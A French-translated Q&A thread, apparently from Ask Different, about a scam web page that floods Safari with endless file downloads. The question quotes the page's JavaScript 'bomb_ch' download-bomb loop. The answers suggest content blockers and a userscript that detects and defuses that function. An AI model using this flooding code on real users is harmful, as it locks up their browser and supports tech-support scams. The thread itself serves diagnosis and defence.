Empêcher les téléchargements de spam sur Safari

8

Contexte

Une nouvelle page de spam a commencé à apparaître sur de nombreux sites "douteux" (sites de cinéma, etc.). Cette nouvelle page de spam s'inscrit dans la catégorie des faux scans, MacKeeper, "VOUS AVEZ UN VIRUS", etc.

Problème

Le problème avec cette nouvelle page est qu'au lieu d'avoir simplement une fenêtre contextuelle, la page lance en fait un téléchargement de fichiers aléatoires de 2 Ko (non dangereux ne contient que du texte aléatoire) à plusieurs reprises tous les ~ 1 ms. Le dossier de téléchargement se remplit avant de pouvoir fermer la fenêtre et vous êtes en train de supprimer plus de 1000 fichiers. Contrairement à un problème similaire dans lequel un spam de page fait apparaître la boîte de dialogue d'impression, il y a très peu de temps pour réagir.

Échec des tentatives de dépannage

  • J'ai essayé de verrouiller le dossier de téléchargement. Bien qu'il ait empêché les téléchargements de ... eh bien ... de le télécharger, une boîte de dialogue (voir image) apparaît. Habituellement, je pouvais simplement fermer cette boîte de dialogue, mais comme le téléchargement est tenté toutes les ~ 1 ms, une nouvelle boîte de dialogue apparaît chaque fois que j'essaie de fermer, m'empêchant de fermer la fenêtre.

  • Forcer à quitter Safari, ce qui arrête le téléchargement (après les téléchargements de 1k) mais je perds toutes mes autres fenêtres

  • Changer les paramètres en «Demander pour chaque téléchargement» dans les préférences de Safari. Ne fonctionne pas parce que 1 Ko de boîtes de dialogue séparées m'empêchent même de fermer l'onglet. Éventuellement planter Safari.

entrez la description de l'image ici

entrez la description de l'image ici

Question

Comment puis-je empêcher les téléchargements de spam dans Safari?

MISE À JOUR:

Voici le code à l'origine du téléchargement (obtenu en désactivant JavaScript et en parcourant manuellement le code):

 function download(g, h, j) {
                var k = new Blob([g], {
                        type: j
                });
                if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
                else {
                        var l = document.createElement("a"),
                                m = URL.createObjectURL(k);
                        l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
                }
        }
        function bomb_ch() {
                var g = Math.random().toString(36).substring(20),
                        h = Math.floor(50 * Math.random() + 25);
                while (true) download(h, g, g)
        }
        function ch_jam() {
                bomb_ch()
        }

Remarque: j'ai rencontré des problèmes lors de l'exécution de JS sur une page personnalisée. Il a gelé au lieu d'être téléchargé. J'ai pu émuler le téléchargement en utilisant une setInterval()fonction appelant la downloadfonction.

Plus d'informations: https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/

macos safari data-transfer malware JBis
la source
Les commentaires ne sont pas pour une discussion approfondie; cette conversation a été déplacée vers le chat .
bmike
@JBis Le temps est presque venu d'attribuer la prime
Matt
@Matt j'ai encore 24 heures. Et je n'accorde aucune réponse dans sa forme actuelle.
JBis

Réponses:

5

Ne serait-ce pas un bon cas pour un bloqueur de contenu Safari / bloqueur javascript qui est sélectif?

Ghostery pourrait être un bon point de départ sur Mac pour voir si vous pouvez utiliser des règles prédéfinies pour annuler les scripts intersites / l'injection de publicité dans les pages Web. Bien sûr, si la page sert directement ce contenu, vous devrez désactiver complètement le javascript sur cette page ou en prendre note et bloquer simplement les sites qui complètent votre expérience intentionnellement ou en raison de la vente d'injection de publicité à toute personne ayant les moyens de payer ces articles effrayants et articles frauduleux.

Si vous voulez être plus précis - les scripts utilisateur de type GreaseMonkey pourraient lutter contre cela avec suffisamment de connaissances JS de votre part (ou trouver quelqu'un qui a écrit le script pour bloquer l'itération d'aujourd'hui de ce malware).

Édité par @JBis

Le script utilisateur suivant a réussi à bloquer la page. 

     // ==UserScript==
     // @name         The Bomb Squad
     // @version      0.1
     // @description  Blocks the pages containing any function with the bomb_ch function detailed in /apple/329594/prevent-spam-downloads-on-safari and https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/
     // @author       Josh Brown (@JBis https://apple.stackexchange.com/users/263848/jbis)
     // @match        *
     // @grant        none

    // ==/UserScript==

   if (typeof bomb_ch === "function") {
     document.getElementsByTagName("body")[0].innerHTML="<h1>Page Defused by The Bomb Squad</h1><p>Because it contatained the following
 function(s):  <pre>bomb_ch()</pre> <br>";
    }

Remarque: les ampèreurs Sp (c) peuvent facilement contourner cela en randomisant la bomb_ch()fonction.

Les nouvelles versions de Safari de OS pourraient aider à réduire un peu cela, mais il y a de l'argent à gagner par les personnes qui livrent cette charge de merde à votre Mac afin qu'elles s'adapteront probablement à toutes les technologies qui tentent de le rendre facile à bloquer. À moins que vous ne vouliez dépenser plus d'argent pour soutenir une entreprise qui maintient une bibliothèque de paramètres qui peuvent «taper-un-taupe» et s'adapter plus rapidement que les charlatans peuvent préparer de nouveaux codes dans leur chaufferie .

Vous devrez également décider si les sites Web qui le font sont également des charlatans qui font partie de la fraude, car ils devraient savoir que cela vous arrive, l'un des visiteurs qu'ils hébergent.

bmike
la source
2
@JBis Tampermonkey fonctionne si vous l'installez manuellement: Contournez «Safari ne prend plus en charge l'extension non sécurisée» dans macOS Mojave
grg
1
@grg Grg ( le son ), vous devez relancer chaque redémarrage du navigateur :)
JBis
5

Bien qu'il existe de nombreux bloqueurs de publicités pour Safari, il existe beaucoup moins de choix pour des bloqueurs de contenu basés sur des extensions à plus large spectre. Parmi ceux-ci, seuls deux se distinguent: Ghostery et uBlockOrigin [ lien d'information: https://github.com/gorhill/uBlock lien de téléchargement: https://safari-extensions.apple.com/?q=ublock%20origin .

EDIT: Ne confondez pas uBlock origine avec le même nom uBlock très, . La capacité et la réputation des deux produits sont sensiblement différentes.

Peuvent-ils faire ce que vous voulez et empêcher le bombardement de téléchargement que vos amis ont connu? Oui, avec la distinction que Ghostery aurait besoin d'une personnalisation des règles où uBlockOrigin est configuré pour le faire par défaut.

Il se trouve que uBlockOrigin a bloqué cet exploit particulier un mois avant l'annonce de Malwarebytes dans votre lien "Plus d'infos". Je ne connais pas la chronologie de Ghostery.

Je vous recommanderais de leur donner un essai.

Doc G.
la source
Veuillez ne pas supprimer la réponse. Peut encore aider les autres. Je continuerai de faire des tests pour voir si l'outil peut bloquer avec une règle personnalisée.
JBis
@JBis si vous souhaitez mettre en place une URL dans le chat que nous pourrons supprimer plus tard, envoyez-moi un ping. Êtes-vous en train de dire que le seul clic «désactiver tout» de ghostery ne vous protège pas de cette fonction.
bmike